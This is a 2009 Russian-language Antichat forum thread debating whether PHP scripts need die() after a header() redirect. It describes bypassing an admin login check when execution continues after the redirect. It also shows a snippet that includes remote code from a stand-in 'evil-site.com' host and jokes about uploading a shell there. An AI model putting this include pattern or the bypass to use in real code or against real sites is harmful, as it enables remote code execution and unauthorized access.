 |
|
31.07.2009, 13:41
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
|
|
|
03.08.2009, 08:57
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
А зачем вообще die() после header() ?
Какая уязвимость может быть тут? Можно пример?
|
|
|
|
03.08.2009, 12:51
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
попугай, в статье электа описано
Вообще багой это будет если например скрипт аплода файлов в админке проверяет залогинен ли ты, если не залогинен тебя ридеректает ява скриптом на login.php, но после редиректа не стоит die(), ты можешьи отправив запрос скриптом обойти эту проверку
Видимо Пашкела просто прочитал статью ничего не поняв и пытается доказать что в этом коде есть ужасная бага, т.к в данном скрипте ничего опасно нет, посты Пашкелы выглядят немного бредом.
Конечно не стоит забывать про особые обстоятельства
Последний раз редактировалось Spyder; 14.08.2009 в 03:25..
|
|
|
|
03.08.2009, 13:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
С нами:
9328706
Репутация:
1503
|
|
Ув.Spyder, готов с Вами подискутировать на эту тему!
А если будет листинг кода подобный этому?
PHP код:
switch($_GET['url'])
{
case "test":
header("location:http://google.ru");
include('http://evil-site.com/'.$_GET['url'].'.txt')
break;
case "test2":
header("location:http://yandex.ru");
default:
header("location:http://google.ru?error");
or die('Ошибон :D');
break;
}
тогда этот буквально как решето!!! всего лишь нужно похекать сайт http://evil-site.com/, и залить туда шелл с именем test.txt и все!!! Мы похеканы! а вот был бы код такой :
PHP код:
case "test":
header("location:http://google.ru");
die();
include('http://evil-site.com/'.$_GET['url'].'.txt')
break;
Мы бы были защищены! =)
Ты просто не знаешь особых условий, чтобы switch сделать инклудом
__________________
You may say I'm a dreamer
But I'm not the only one
|
|
|
|
03.08.2009, 13:19
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
PHP код:
<?php
if(isset($_REQUEST['url'])) {
switch($_REQUEST['url']]) {
case 'test':
header("Location: http://goggle.com");
break;
case 'test2':
header("Location: http://yandex.ru");
break;
default:
header("Location: http://google.com/error");
break;
}
exit;
}
?>
<form>
<input type="text" name="url">
<input type="submit">
</form>
|
|
|
|
03.08.2009, 13:21
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
ебаный насос, да вы тут развели 5 страниц на 5 строк кода. даже не заметил.
|
|
|
|
03.08.2009, 13:26
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами:
10309346
Репутация:
4303
|
|
GreenBear, ппц, ты не в курсе что у тебя в коде 4 баги? Забыл что надо die() ставить? Вступай в наш фан-клуб, узнаешь как писать безопасный код
|
|
|
|
03.08.2009, 13:28
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
:'(  |
|
|
|
03.08.2009, 13:28
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Spyder
попугай, в статье электа описано
Вообще багой это будет если например скрипт аплода файлов в админке проверяет залогинен ли ты, если не залогинен тебя ридеректает на login.php, но после редиректа не стоит die(), ты можешьи отправив запрос скриптом обойти эту проверку
Да статью я читал и не раз.. но тем не менее не могу понять в чем уязвимость...
Вот например такой код из твоего примера...
PHP код:
if(!$logged){
header('location: url');
}else{
move_upload_file();
}
Какая тут уязвимость может быть?......
|
|
|
|
03.08.2009, 13:29
|
|
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
С нами:
11058146
Репутация:
4536
|
|
попугай, вы тут все какую - то ересь несете ))
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
